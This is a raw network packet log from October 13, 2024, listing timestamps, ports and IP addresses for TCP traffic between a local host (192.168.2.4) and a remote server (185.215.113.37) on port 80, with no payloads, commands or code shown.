Oct 13, 2024 17:46:16.781207085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781213999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781259060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781265974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781299114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781315088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781346083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781348944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781398058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781400919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781433105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781447887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781466961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781481028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781498909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781523943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781533003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781543970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781565905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781578064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781609058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781618118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781668901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781668901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781703949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781735897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781745911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781754017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781788111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781801939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781831980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781836987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781872034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781887054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781919003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781924963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781960011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781974077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782004118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782010078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782042980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782057047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782088995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782093048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782140970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782145023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782193899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782195091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782227039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782243013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782273054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782277107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782325983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782351017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782381058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782401085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782413960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782423019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782448053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782461882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782494068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782497883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782546043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782548904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782583952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782597065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782617092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782633066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782649040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782660007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782682896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782697916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782732010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782732964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782766104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782776117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782798052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782814026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782852888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782852888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782886982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782896042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782921076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.782938004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782965899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.782968998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783016920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783020973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783054113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783066034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783087015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783102989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783117056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783139944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783149004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783164978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783198118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783200979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783232927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783250093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783266068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783301115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783317089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783317089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783333063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783350945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783365965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783380985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783413887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783420086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783452988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783473969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783487082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783518076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783550978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783555984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783581972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783607006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783616066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783626080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783648968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783663034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783682108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783694983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783715010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783730984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783747911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783781052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783792019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783807039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783813000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783828974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783844948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783859968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783878088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783894062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783910990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783927917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783946037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.783957005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.783978939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784013987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784043074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784044981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784073114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784077883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784095049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784111023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784123898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784142971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784157991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784174919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784192085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784209013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784223080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784241915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784256935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784292936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784307957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784327984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784343004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784360886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784375906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784393072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784410954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784426928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784437895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784460068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784492016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784506083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784522057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784528971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784548044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784567118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784574032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784600019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784614086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784634113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784652948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784667015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784682989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784703016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784715891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784734964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784753084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784769058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784782887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784801006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784815073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784835100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784851074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784866095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784885883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784899950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784914017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784933090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784946918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.784966946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.784980059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.785001040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.785013914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.785034895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.785046101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.785067081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.785079956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.785104036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.785109043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.785136938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.785170078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.785170078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.785187006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.785203934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.785222054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.785249949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.871568918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871584892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871598005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871615887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871627092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871639013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871650934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871714115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871721029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.871726990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871738911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871751070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871762991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871779919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.871803045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.871839046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871850014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871861935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871872902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871882915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871893883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871903896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.871903896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.871905088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871917963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.871936083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872005939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872049093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872061014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872071981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872097969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872109890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872123003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872136116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872145891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872167110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872178078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872188091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872189999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872201920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872212887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872219086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872251034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872282028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872293949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872304916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872315884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872328043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872330904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872339010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872345924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872375965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872379065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872385979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872391939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872397900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872464895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872503042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872514963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872525930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872554064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872565985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872601986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872615099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872621059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872627020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872632027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872644901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872673035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872673035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872684956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872695923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872700930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872709036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872720003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872728109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872730970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872756004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872770071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872773886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872786999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872797012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.872814894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.872836113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.873202085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.873222113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.873231888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.873248100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.873276949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.873291969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.873302937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.873313904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.873325109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.873336077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.873337030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.873346090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.873382092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.904803991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.904823065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.904831886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.904860973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.904871941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.904959917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.904974937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.904985905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.904997110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905004978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905008078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905020952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905035019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905040026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905050993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905061960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905064106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905075073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905086040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.905086994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905097961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.905107975 CEST	49730	80	192.168.2.4	185.215.113.37
